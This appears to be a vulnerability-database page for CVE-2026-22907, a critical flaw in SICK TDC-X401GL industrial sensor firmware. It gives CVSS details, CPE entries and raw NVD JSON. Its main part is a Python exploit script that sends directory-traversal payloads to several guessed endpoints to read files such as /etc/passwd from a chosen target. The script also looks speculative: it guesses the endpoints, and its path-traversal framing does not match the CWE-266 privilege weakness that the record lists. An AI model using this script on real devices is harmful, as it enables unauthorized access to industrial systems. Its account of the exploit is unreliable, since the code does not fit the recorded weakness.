Security Vulnerability Report
中文
CVE-2026-22907 CVSS 9.9 CRITICAL

CVE-2026-22907

Published: 2026-01-15 13:16:05
Last Modified: 2026-01-23 15:49:41
Source: [email protected]

Description

An attacker may gain unauthorized access to the host filesystem, potentially allowing them to read and modify system data.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK工业传感器产品(具体型号待官方安全公告确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22907 PoC - Path Traversal in SICK Product # Target: SICK industrial sensor devices # This PoC demonstrates unauthorized filesystem access def exploit_cve_2026_22907(target_url, filename): """ Exploit path traversal vulnerability to read arbitrary files Args: target_url: Base URL of the vulnerable SICK device filename: File to read (e.g., /etc/passwd) """ headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-22907-PoC)', 'Accept': '*/*' } # Path traversal payload to read arbitrary files # Common traversal patterns used in ICS/SCADA devices traversal_patterns = [ f'../../../../../../../../..{filename}', f'..\..\..\..\..\..\..\..{filename}', f'....//....//....//....//....//....//....//....{filename}' ] # Try different path traversal patterns for pattern in traversal_patterns: # Common vulnerable endpoints in SICK devices endpoints = [ '/file/read', '/api/file', '/log/download', '/diag/file', '/config/backup' ] for endpoint in endpoints: try: # Attempt to read file through vulnerable endpoint params = {'path': pattern} response = requests.get( f'{target_url}{endpoint}', params=params, headers=headers, timeout=10, verify=False ) if response.status_code == 200 and len(response.content) > 0: print(f'[+] SUCCESS: Read {filename}') print(f'[+] Endpoint: {endpoint}') print(f'[+] Pattern: {pattern}') print('-' * 50) print(response.text[:500]) return True except requests.exceptions.RequestException as e: print(f'[-] Error with {endpoint}: {e}') continue print('[-] Exploitation failed - target may not be vulnerable') return False if __name__ == '__main__': if len(sys.argv) < 3: print(f'Usage: python {sys.argv[0]} <target_url> ') print(f'Example: python {sys.argv[0]} https://192.168.1.100 /etc/passwd') sys.exit(1) target = sys.argv[1] file_to_read = sys.argv[2] print(f'[*] CVE-2026-22907 PoC - SICK Path Traversal') print(f'[*] Target: {target}') print(f'[*] File: {file_to_read}') print() exploit_cve_2026_22907(target, file_to_read)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22907", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:05.263", "lastModified": "2026-01-23T15:49:41.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker may gain unauthorized access to the host filesystem, potentially allowing them to read and modify system data."}, {"lang": "es", "value": "Un atacante puede obtener acceso no autorizado al sistema de archivos del host, lo que potencialmente les permite leer y modificar datos del sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.0", "matchCriteriaId": "B95FBF38-3829-4FC4-BBFD-137B810FAA5A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.